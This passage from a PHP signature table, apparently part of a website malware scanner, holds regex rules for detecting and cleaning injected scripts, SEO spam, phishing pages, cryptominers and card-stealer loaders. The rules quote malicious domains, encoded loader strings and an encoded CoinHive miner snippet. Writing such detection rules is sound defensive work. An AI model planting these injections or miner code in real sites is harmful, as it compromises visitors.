		'if(document.getElementById(\'HiddenDiv\') != null){document.getElementById(\'HiddenDiv\')' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.hidden-div.001', '<div\s*id..HiddenDiv.>(\s*\w+\s+[^>]+a\s*href[^>]+>\s*\w+[^>]+<.a>)+[^>]+div><script[^>]+>if.document.getElementById..HiddenDiv[^>]+script>'),
		'<!-- qweiop21 -->' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.hidden-div.002', '<.-- qweiop21 -->[^>]+<p\s*id..\w{3,}.><script[^<]+document.getElementById..\w{3,}...style.display\s*=\s*.none[^>]+script>[^>]+(<a href=.http:[^>]+>(\s*\w+\s*)+<.a>)+[^>]+<.p>[^>]+qweiop22 -->'),
		'<div id=\'HideM' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.004', '<div id=\'(HideM[eE]Better)\'>.+?<\/div>\s*<script type[^<]+?(getElementById..\1..)\s*!=\s*null[^<]+?\2.style.visibility\s*=\s*.hidden.[^<]+?\2.style.display\s*=\s*.none.;}<\/script>'),
		'<script type=\'text/javascript\'>if(document.getElementById(\'hidehi\')' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hideMe.002', '<script type=.text.javascript.>if\\(document.getElementById\\(.hidehi[^<]+display = .none.;}<.script>'),
		'<title>Adidas Yeez Boost 350 V2 \'Beluga\'  Info &amp; Release Date</title>' => array(STR_CLEARFILE, 'html.spam-seo.generic.010', NULL),
		'(function(s,r,b,m,l){l.getElementById(b).style[' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-style.016', '\(function\(([\w],)*[\w]\)[\s]*\{[\w]\.getElementById\([\w]\)\.style\[.[\w].[^<]+\+\([\d]+\+[\d]+\),.[\w]+.,document\)'),
	),

	'id="scriptData' => array(STR_TRIGGER,
		'realstatistics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003',    '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..realstatistics[^"]+php">[\s]*<.script>'), 
		'realanalytics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.02', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..realanalytics[^"]+php">[\s]*<.script>'), 
		'real-analytics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.03', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..real-analytics[^"]+php">[\s]*<.script>'), 
		'istatistics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.04', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..istatistics[^"]+php">[\s]*<.script>'), 
		'siteanalytics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.05', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..siteanalytics[^"]+php">[\s]*<.script>'),
		'webstatistics' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.06', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..webstatistics[^"]+php">[\s]*<.script>'),
		'adsstat' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.07', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..adsstat[^"]+php">[\s]*<.script>'), 
		'realtds' => array(STR_CLEAR_MULTIMATCH, 'js.malware.neutrino.003.08', '<script language[^>]+id="scriptData"><.script>[\s]*<script language="[Jj]ava[sS]cript"[^>]+src="http:..realtds[^"]+php">[\s]*<.script>'), 
	),

	'.js?' => array(STR_CHAIN_TRIGGER,
		'cdn.allyouwant.online' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_allyouwant.001', '<script[^>]+allyouwant.online[^>]+><.script>'),
		'cdn.eeduelements.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_eedu.001', '<script[^>]+cdn.eeduelements.com[^>]+><.script>'),
		'uustoughtonma.org' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_uustoughtonma.001', '<script[^>]+uustoughtonma.org[^>]+><.script>'),
		'adrequest.xyz' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_adrequest.001', '<script[^>]+adrequest.xyz[^>]+><.script>'),
		'\/.jquery.min.js\?style=.rim' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector.060', '<script[\s]*type=.text\/javascript.[^:]+src=.https?:\/\/[\w]*[\.]*[\w]+\.[\w]+\/.jquery\.min\.js\?style=.rim.?&.><\/script>'),
		'freecounter.ovh' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.015', '<script\s*type=[\'"][^=]+=[\'"]http[s]*:\/\/[\w]*[\.]*freecounter\.ovh[^\?]+[\w]*\.js\?[\w]*=[\w]+\&[^>]+><\/script>'),
		'trasnaltemyrecords.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_trasnaltemyrecords.001', '<script[^>]+trasnaltemyrecords\.com[^>]+>[\s]*<.script>'),
	),

	'<a href="http' => array(STR_TRIGGER,

		'<span class="mylinkcode" style="display:none"><script src="http:' => array(STR_TRIGGER,
			';</a><a href="http:' => array(STR_TRIGGER,
				'</script><!-------' => array(STR_CLEAR_LINEMATCH, 'html.spam-seo.injector.001', '<span class="mylinkcode" style="display:none"><script src="http:[^\?]+----><.span>'),
			),
		),

		'<div' => array(STR_TRIGGER,
			'window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64"]' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-style.018', '<script>[^<]*window\[..x64.x6f.x63.x75.x6d.x65.x6e.x74[^<]+<.script>'),
		),

		'consent script</a></noscript>' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.032', '<\!--\s*Begin\s*Cookie[^>]+>\s*<script[^>]+>\s*window.cookieconsent[^"]+"message":"This\s*website\s*uses\s*cookies[^\']+\'\w+-\w+-\w+[^\']+\';<.script>\s*<script\stype=.[^\'"]+"\s*src=...[^\/]+\/libs\/cookie[^>]+><.script>\s*<noscript><a\s*href=["\'][^>]+>(EU\s*)?[Cc]ookie\s*[Cc]onsent\s*[Ss]cript<.a><.noscript>\s*\<\!--\s*End\s*Cookie\s*Consent\s*script\s*-->'),
		'[0])}}if(navigator.userAgent.toLowerCase()' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.060', '<script[^>]*>function[\s]*[\w]+\([\w]+\)\{var [\w]+=.[\d]+.,[\w]+=.[\d]+.,[\w]+=.([\w]+).,[^}]+String.fromCharCode\(parseInt[^>]+navigator.userAgent.toLowerCase\(\).indexOf[^>]+<.script>[\s]*<div[\s]*class=.\1.[^#]+?<.div>'),
	),

	'</script><!--/' => array(STR_TRIGGER,

		'<!--\w\w\w\w\w\w--><script' => array(REX_TRIGGER,

			';try{' => array(STR_TRIGGER,
				'--><script' => array(STR_CLEAR_MULTIMATCH, 'js.blackhole.generic.001', '<!--\w\w\w\w\w\w--><script[^<]+(;|\}|\))[^>]+<.script><!--.\w\w\w\w\w\w-->'),
			),
	
			'--><script type="text/javascript" src=' => array(STR_CLEAR_LINEMATCH, 'js.blackhole.generic.002', '<!--\w\w\w\w\w\w--><script[^>]+src[^>]+php\?id[^>]+><.script><!--.\w\w\w\w\w\w-->'),
			'--><script src=' => array(STR_CLEAR_LINEMATCH, 'js.blackhole.generic.002.02', '<!--\w+--><script\s*src\s*=\s*.http[^\?]+(php|js)\?id=[^>]+><.script>\s*<!--\/\w+-->'),
			'<!--[\s]*([\w]+)[\s]*-->[\s]*<script[^>]*>[\s]*<.script>[\s]*<!--.?\1[\s]*-->' => array(REX_CLEAR_MULTIMATCH, 'php.malware.mlw_comment_tag.006.02', '<!--[\s]*([\w]+)[\s]*-->[\s]*<script[^>]*>[\s]*<.script>[\s]*<!--.?\1[\s]*-->'),
		),
	),

	'createElement' => array(STR_TRIGGER,
		'script&se_referrer=\' + encodeURIComponent' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.027', '<script\s*type=[^>]+>\s*var\s*\w+=document;var\s*\w+=\w+.createElement..script..;\s*\w+.src=.http[^\?]+\?[^=]+=script\&[^=]+=.\s*[^;]+;\s*if\s*.document.currentScript.[^\'"]+.head.\)\[\d+\].[^\}]+\s*}\s*<.script>'),
		'<span style="font-family:&#39;office365icons&#39;;color:transparent;">A</span>' => array(STR_CLEARFILE, 'html.phishing.hotmail.011', NULL),
		'window,document,\'script\',\'//cdn.owlcdn.com' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.064', '<script>[\s]*\(function\(i.s.o.g.r.a.m\)\{[\w]+\[.GoogleAnalyticsObject[^\>]+window.document..script.....cdn\.owlcdn\.com[^>]+<.script>'),
		'src="//wibeee.com.ua' => array(STR_CLEAR_MULTIMATCH, 'html.malware.dropper.003', '(?:<scrip[^>]+>\s*<\/script>\s*)?<script\s*type=[\'"]text\/javascript[\'"]\s*src=[\'"]\/\/wibeee\.com\.ua\/[^>]+>\s*<\/script>\s*<scrip[^>]+>\s*var\s*_Hasync[^>]+>\s*<noscript>\s*<a\s*href[^<]+<img\s*src[^>]+>\s*<\/a>\s*<\/noscript>(?:\s*<script\s*type=[\'"]text\/javascript[\'"]>\s*<\/script>)?'),
	),

	'popcash.net' => array(STR_TRIGGER,

		'var wid' => array(STR_CHAIN_TRIGGER,
			'cdn.popcash.net/pop.js' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.popcash.001', '<script[^>]+cdn.popcash.net.pop.js.><.script>'),
			'var uid' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.popcash.001.02', '<script type[^>]+>[\s]*var uid = .[\d]+.;[\s]*var wid = .[\d]+.;[\s]*<.script>'),
		),

		';document.write(' => array(STR_TRIGGER,
			'cdn.popcash.net/pop.js%22%3E%3C/script%3E' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.popcash.001.03', '[\w]+=.%3Cscript%20[^;]+popcash.net[^;]+;[\s]*[\w]+[\s]*=[\s]*unescape\([^;]+;[\s]*document\.write\([^;]+\);'),
		),
	),

	'<html lang="ja">' => array(STR_TRIGGER,

		'<title>&#' => array(STR_TRIGGER,
			'"copyright"><a href="http://www.continuer.jp/policy.php">privacy policy</a>' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.006.002', NULL),
			'Yahoo Japan Corporation. All Rights Reserved.' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.006.003', NULL),
		),

		'<img src="http://www.orbis.co.jp/contents/images/foot' => array(STR_CLEARFILE, 'html.spam-seo.japanese-spam.006', NULL),
	),

	'function PopShow3' => array(STR_TRIGGER,
		'kmr9eE1=update' => array(STR_CLEAR_LINEMATCH,'js.malware.PopShow3.001','<script>function PopShow3\(\).+?kmr9eE1=.+?PopShow3;\}<\/script>'),
		'<script>function PopShow3(){var' => array(STR_CLEAR_LINEMATCH, 'js.malware.PopShow3.002', '<script>function PopShow3...var[^<]+PopShow3;}<.script>'),
		'"PopWin3","_blank,resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1");' => array(STR_CLEAR_MULTIMATCH, 'js.malware.PopShow3.003', '<script[^>]*?>\s*var params = "menubar=yes,[^"]+?"\s*function PopShow3\(\)[^3<]+window.open\(.http:[^,]+?, "PopWin3","_blank,resizable=1.+document.onmouseup=PopShow3;\s*<.script>'),
	),

	'collect.js' => array(STR_TRIGGER,
		'122.155.168.105/ads/inpage/pub/collect.js' => array(STR_CLEAR_LINEMATCH,'js.malware.injector.021', '<script (language=".ava.cript"|type="text.javascript") src="http:..122.155.168.105.ads.\w+.pub.collect.js[^>]+><.script>'),
		'179/collect.js' => array(STR_CLEAR_LINEMATCH,'js.malware.injector.022', '<script (language=".ava.cript"|type="text.javascript") src="http:..193.169.87.179\/collect.js[^>]+><.script>'),
		'clickevents.com.my/' => array(STR_CLEAR_LINEMATCH,'js.malware.injector.023', '<script (language=".ava.cript"|type="text.javascript") src="http:..www.clickevents.com.my\/scripts\/collect.js[^>]+><.script>'),
	),

	'* Front to the WordPress application.' => array(STR_TRIGGER,
		'echo \'<script src=' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.053', 'echo .<script src=[^;]+>.;'),
		'<iframe class=' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.unwanted_ads.002', '<script\s*type=[\'"][^=]+=[\'"]\/\/[\w\.-]+\/[^>]+>\s*<\/script>(?:\s*<ifram[^>]+>\s*<\/iframe>\s*)+(?=<\?php)'),
	),

	'var _$=["document","write",\'<script src' => array(STR_TRIGGER,
		'"write",\'<script src="http://niu.code668.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.niu_code668_com.001', 'var _\$=\[.document.,.write.,.<script src=.http:..niu.code668[^\]]+?\];window\[_[^;]+?;window[^)]+?\);'),
		'"write",\'<script src="http://u.1133.cc' => array(STR_CLEAR_LINEMATCH, 'js.malware.u_1133_cc.001', 'var _\$=\[.document.,.write.,.<script src=.http:..u.1133.cc[^\]]+?\];window\[_[^;]+?;window[^)]+?\);'),
	),

	'google|msn|live|altavista' => array(STR_TRIGGER,
		'{echo\'<script' => array(STR_TRIGGER,
			'$_SERVER[\'HTTP_REFERER' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.214', 'if\s*\(\s*preg_match\s*\(\s*[^\w]+google\|msn\|live\|altavista[^,]+,\s*\$_SERVER\[.HTTP_REFERER[^\{]+\{echo.<script\s*src=[\'"]http[^"\']+.\s*type=.text.javascript.>\s*<.script>.;\}'),
		),
	),

	'\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73' => array(STR_TRIGGER,
		'"];function httpGet(_0x' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_eedu.002', '\(function\(\) \{ "use strict";[\s]*var _0x[\w]+=\["[^;]+\\\\x65\\\\x65\\\\x64\\\\x75\\\\x65\\\\x6C\\\\x65\\\\x6D\\\\x65\\\\x6E\\\\x74\\\\x73[^}]+\}[\s]*var[\s]*curdomain[^}]+\}\)\(\)\}[\s]*\}\)\(\);'),
	),

	'clksite.com' => array(STR_TRIGGER,
		'tid=165434_292830' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.002', '<script\s*data-cfasync\s*=\s*.false.\s*type\s*=\s*.text.javascript.\s*src=...clksite\.com[(?:\w+\/)]+tid=165434_292830[(?:\w+\s*\=\/\&)]+.><.script>'),
	),

	'<script type="text/javascript"> var kwcid="4"; var kwurl =' => array(STR_TRIGGER,
		'f.parentNode.insertBefore(s, f);' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.052', '<script type="text.javascript">[\s]*var kwcid="[\d]+";[\s]*var kwurl = "[^>]+>[\s]*<script type[^<]+f.parentNode\.insertBefore\(s[^>]+<.script>'),
	),

	'flashplayer">' => array(STR_TRIGGER, 
		'[\d]{1,3}\.[\d]{1,3}\.[\d]{1,3}\.[\d]{1,3}[^"]+flashplayer' => array(REX_CLEAR_MULTIMATCH, 'rex.fake_flash.001', '<script[\s]*src="https?:..[\d]{1,3}\.[\d]{1,3}\.[\d]{1,3}\.[\d]{1,3}[^"]+flashplayer">[^<]{0,10}<.script>'),
	),

	'/js/js.js' => array(STR_TRIGGER,
		'print(\'<script' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.243', 'if\s*\(\s*\(\s*\$_SERVER\s*\[\s*["\']\w+["\']\s*\]\s*[^\)]+?\)[^\{]+?\{\s*(?:print[^;]+?;\s*)?print\s*\(\s*["\']\s*<script[^>]+?\/js\/js\.js["\']>\s*<\/script>[^;]+?;\s*\}\s*(?:\/\/#*=*\d*=*#*\s*(?:@[^;]+?;\s*)*@?\s*\/\/#*=*\d*=*#*)?'),
	),

	'new Client.Anonymous(' => array(STR_TRIGGER,
		'hrottle:' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.026', '<script src[\s]*=[\s]*.http[^>]+>[\s]*<.script>[\s]*<script>[\s]*var _client[\s]*=[\s]*new Client\.Anonymous[^\}]+\}[\s]*\);[\s]*_client\.start\(\);[\s]*<.script>'),
	),

	'function xViewState()' => array(STR_TRIGGER,
		'+=String.fromCharCode(parseInt(t)+' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.xViewState.001', '<script language=.JavaScript.>[\\s]*function xViewState\\(\\)[\\s]*\\{[\\s]*var[^(]+new Array..[\\d]+[^>]+>[^w]+xViewState..;[\\s]*<.script>'),
	),

	'&& !($_SESSION["__default"]["user"]->id)) {echo "' => array(STR_TRIGGER,
		'<script language=JavaScript src=/' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector_gen.029', '(\$[\w]+)=1;\s*if\(is_object\(\$_SESSION\["__default"\]\["user"\]\)[^{]+\{[\s]*echo[\s]*"[\s]*<script[^>]+><.script>[\s]*<script language[\s]*=[\s]*JavaScript[\s]*src=\/[^>]+php[\s]*><.script>[\s]*"[\s]*;[\s]*\};[\s]*\1=1;'),
	),

	'dancewithme.biz' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.044', '<script[^<]+?dancewithme.biz[^<]+?<.script>'),
	'\(function\(\)[\s]*\{[\s]*var [\w]=window;[\s]*[\w]\["[^}]+\\\\u00[\w]{2}[^}]+\\\\x[\w]{2}[^}]+\\\\u00[\w]{2}[^}]+\\\\x[\w]{2}' => array(REX_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.009', '\(function\(\)[\s]*\{[\s]*var [\w]=window;[\s]*[\w]\["[^}]+\\\\u00[\w]{2}[^}]+\\\\x[\w]{2}[^}]+\\\\u00[\w]{2}[^}]+\\\\x[\w]{2}[^<]+[\w]\(\)\}\)\(\);'),
	'recaptcha-in.pw' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.010.02', '<(\?php|iframe|script)[^\n]+recaptcha-in\.pw[^\n]+(script|iframe|\?)>'),
	'google-statik.pw' => array(STR_CLEAR_MULTIMATCH, 'php.malware.dropper.010.03', '<(script|iframe)[^:]+:..google-statik\.pw[^>]+>?<.(script|iframe)>'),
	'king.cash' => array(STR_CLEAR_LINEMATCH, 'html.malware.fake_jquery.001.02', '<script\s*type\s*=\s*.text.javascript.\s*src\s*=\s*.http:..king\.cash.jquery[^>]+><.script>'),
	'static-4677.kxcdn.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.018', '<script[^>]+src=.(http:)?\/\/static-4677\.kxcdn.com[^<]++<.script>'),
	'\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.028', '<script\s*language\s*=\s*.javascript.>\s*window\s*\[.[^\s]+\s.x74.x79.x70.x65.x3d.x22.x74.x65.x78.x74.x2f.x6a.x61.x76.x61.x73.x63.x72.x69.x70.x74.x22\s*.x73.x72.x63.x3d.x22.x68.x74.x74.x70.x3a.x2f.x2f.x69.x70.x2e.x35.x75.x75.x38.x2e.x63.x6f.x6d.x2f.x69.x70.x2f.x69.x70.x5f[^\)]+\);[^<]+<.script>'),
	'%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.006', '<script>eval\(\s*unescape\(\s*.%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72[^\'"]+.\s*\)\);<.script>'),
	'{  return (eval(\'pars\'+\'eInt\')(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.033', '<script>function\s*\w{10,}\(\w{10,}\)\{\s*return\s*\(eval..pars...eInt.\)\(\w+,\w+\)\);\}function\s*\w{10,}\(\w{10,}\)\{\s*function\s*\w{10,}\(\)\{return\s*\d{1,3};\}\s*var\s*\w{10,}=\'\';\s*[^\.]+.length;[^\+]+\+=\w{10,}[^\']+..;\w{10,}=document;var\s*[^\']+[^\+]+\+\w{3,10}\+[^<]+<.script>'),
	'src="http://cdn.widgetserver.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.inject_cdnwidgetserver.001', '<scrip[^:]+:\/\/cdn\.widgetserver\.com\/[^>]+><\/script>'),
	'<!-- counter --><script language=' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.005', '<.-- counter --><script lan.*script><.-- counter -->'),
	'.dyndns.info/' => array(STR_CLEAR_LINEMATCH, 'html.iframe.generic.003', '<script language=[^<]*\.dyndns\.info\/[^<]*<\/script>'),
	'\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x77\x72\x69\x74\x65\x2E\x77\x73' => array(STR_CLEAR_LINEMATCH,'js.malware.rewrite_ws.001','<script [^>]+?>var _0x\w+=\[[^\]]+.x74.x65.x2E.x77.x73[^\]]+][^<]+?<.script>'),
	'"seo-position-report.net/SEO-report/js/seoTrac.js' => array(STR_CLEAR_MULTIMATCH,'js.malware.seo-position-report.001','<script type="text.javascript">\s*var seoJsHost[^<]+?\+"seo-position-report.net.SEO-report.js.seoTrac.js\'[^<]+?<.script>'),
	'<script src="http://redirect.lifax.' => array(STR_CLEARFILE, 'php.spam-seo.redirect.016', NULL),
	'cloudfrond.org' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.024', '<script (language=".ava.cript"|type="text.javascript") src=[^>]+cloudfrond.org[^>]+><.script>'),
	'-google.info/' => array(STR_CLEAR_LINEMATCH, 'js.malware.fake-domain.001', '<script [^>]+-google.info\/[^>]+><?\/script>'),
	'.split(\'*\');for(var' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.022', '<scri[^<]+var\s*\w+..\w+:function...this.[^>]+split\(\'\*\'\);for\(var[^>]+charCodeAt\(0\)\^[^>]+(\w+\*){40}[^>]+;<.script>'),
	'/script.php"><' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.025', '<script\s*src=.http...(\w+[^\>]+\.\w{1,}).(\w+)?.script.php.>\s*<.script>'),
	'/script.php">' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.026', '<script\s*src=.http...(\w+[^\>]+\.\w{1,}).(\w+)?.script.php.>\s*<.script>'),
	'aiobot.de/images/ads.js"><' => array(STR_CLEAR_LINEMATCH, 'js.malware.aiobot.001', '<script[^>]+src=.http...aiobot.de\/images\/ads.js.><.script>'),
	'=\'%\';eval(unescape((\'var' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.029', '<script[^;]+function...var\s*\w+=...;eval.unescape[^;]+\.replace[^;]+\(\);[^>]+--><.script>'),
	'http://gccanada.com/jquery.js' => array(STR_CLEAR_LINEMATCH, 'html.malware.fake_jquery.001', '<script[^>]+?src=.http:..gccanada.com\/jquery.js.><.script>'),
	'try_pick_colors();}</script>' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.028', '<script[^\n]+if \(typeof\(redef_colors\)[^\n]+try_pick_colors..;.\s*<.script>'),
	'href="http://cyberheroez.ddos.im/ico.png' => array(STR_CLEARFILE, 'html.defaced.CyberHeroez.001', NULL),
	'online-sale24.com/1.js\'></script>' => array(STR_CLEAR_LINEMATCH, 'html.malware.online_sale24.001', '<script[^>]+?online-sale24.com\/1.js.><.script>'),
	'<h3><a href="http://www.google.comrss2.html">News</a>Last updated:' => array(STR_CLEARFILE, 'html.spam-seo.generic.009', NULL),
	' src="https://s3-eu-west-1.amazonaws.com/assets.cookieconsent.silktide.com/current/plugin.min.js"' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.007', '<script[^>]+?src=.https:..s3-eu-west-1.amazonaws\.com\/assets\.cookieconsent\.silktide\.com\/current.plugin.min.js.><.script>'),
	'echo .<script src[\s]*=[\s]*.https?:..[\d]+\.[\d]+\.[\d]+\.[\d][^>]+>[\s]*<.script>.;' => array(REX_CLEAR_MULTIMATCH, 'rex.js_injector.002', 'echo .<script src[\s]*=[\s]*.https?:..[\d]+\.[\d]+\.[\d]+\.[\d][^>]+>[\s]*<.script>.;'),
	'<\/script><.--\w{48}-->' => array(REX_CLEAR_MULTIMATCH, 'rex.mlw_comment_tag.004', '<.--\w{48}--><script.*<\/script><.--\w{48}-->'),
	'data:application/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoI' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.036', '<script\s*src=\s*[\'"]data:application\/javascript\s*;\s*base64\s*,\s*ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoI[^>]+><.script>'),
	'%2F%2F%63%6F%69%6E%68%69%7' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.008', '<scrip[^>]+>\s*<\s*\?(?:php)?\s*echo\s*(?:["\'\.\(documentwriteunescape\s*%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%69%6E%68%69%76%65%2E%63%6F%6D%2F%6C%69%62%2F%63%6F%69%6E%68%69%76%65%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%20%3C%73%63%72%69%70%74%3E%76%61%72%20%76%3D%6E%65%77%20%43%6F%69%6E%48%69%76%65%2E%41%6E%6F%6E%79%6D%6F%75%73%28%27%53%45%4C%66%36%69%42%75%75%42%75%68%51%74%37%75%5A%56%34%66%49%4D%65%75%55%50%68%50%74%47%50%63%27%29%3B%76%2E%73%74%61%72%74%28%29%3B%3C%2F%73%63%72%69%70%74%3E])+\)[\'"]\.[\'"]\)\s*;\s*[\'"]\s*;\s*\?>\s*<.script>'),
	'<script type="text/javascript">var _0xf' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-iframe.004', '<script[^>]+>var\s*_0x\w+=..(\\\x\w\w){20,}.,.(\\\x\w\w){2,}..;document._0x\w+[^;]+;<.script>'),
	'<script>function hashdate ' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.014', 'function hashdate[\s]*\(str\)[^\n]+appendChild\([^\}]+\};[\s]*runonload\(\);'),
	'js_kod2.setAttribute(\'style\',\'visibility:hidden\');' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.020', '<script>[\\s]*if.document.loaded. \\{[\\s]*showBrowVer\\(\\);[^<]*js_kod2.setAttribute..style.,.visibility:hidden..;[\\s]*document.getElementById..[\\w]+...appendChild.js_kod2.;[\\s]*\\}[\\s]*<.script>'),
	'data:,String.fromCharCode' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.hidden-iframe.007', '<script>\s*function\s*createCSS[^>]+document.styleSheets.length>[^>]+data:,String.fromCharCode[^>]+function\(\)\{return[^>]+script>'),
	'var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(louis vuitton)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.093', 'header..Content-Type[^\n]+;\n\$key\s*=\s*\$_SERVER..HTTP_USER_AGENT[^;]+;\n[^;]+\$GoTo[^;]+;\s*\nheader.sprintf..Location[^>]+echo\s*.<script[^<]+host;window.adworkergo[^>]+script..;\}'),
	'alert ("VIP 163' => array(STR_CLEARFILE, 'js.spam-seo.injector.022', NULL),
	'wearilyc=""; for(wearilyd=0;wearilyd<wearilyb.length;wearilyd++) { wearilyc+=String.fromCharCode' => array(STR_CLEARFILE, 'js.redirect.window_location.006', NULL),
	'<script type=\'text/javascript\'>(new Function(String.fromCharCode(' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.021', '<script type=\'text.javascript\'>\\(new Function\\(String.fromCharCode\\(([\\d]+[\\s]*[-+][\\s]*[\\d]+,[\\s]*){10}[^;]+;<.script>'),
	'var ClickkyFull = new ClickkyFull(' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.039', '<!-- BEGIN CODE[\\s]*.literal. -->[\\s]*<script src=.http[^>]+><.script>[\\s]*<script type[^>]+>[\\s]*var [\\w]+ = \\{[^}]+};[\\s]*var ClickkyFull = new ClickkyFull\\([\\w]+\\);[\\s]*ClickkyFull.init..;[\\s]*<.script>[\\s]*<!-- ..literal} END CODE -->'),
	'<link rel="shortcut icon" href="images/liamg.ico">' => array(STR_CLEARFILE, 'html.phishing.googledocs.005', NULL),
	'public/js/wp_js.js">' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injection.095', '<script\ssrc=[\'"]http...\w+.\w+.public.js.wp_js.js[\'"]><script>'),
	'false}if(isMobile()=== true){document[' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.053', 'var [\w\$]+=\["userAgent","vendor","opera[^}]+\};return false\}if\(isMobile\(\)===[\s]*true\)\{document[^}]+\]\)\}'),
	'var adlinkfly_url = \'https://cutwin.com' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.037', '<script\s*[^>]+>\s*var\s*adlinkfly_url\s*=\s*\'http(s)?:\/\/cutwin\.com[^;]+;\s*var\s*adlinkfly_api_token\s*=[^;]+;\s*var\s*adlinkfly_advert\s*=\s*\d+\s*;\s*var\s*adlinkfly_exclude_domains\s*=[^;]+;\s*<\/script>\s*(?:<br>\s*)?<script\s*src\s*=\s*["\']\/\/cutwin.com\/js\/[^>]+><\/script>'),
	'eclkmpbn.com' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.eclkmpbn_com.001', '<script[^>]+eclkmpbn.com.adServe[^>]+>[^<]*<.script>'),
	'<TITLE>FEDEX | Tracking' => array(STR_CLEARFILE, 'php.phishing.fedex.001', NULL),
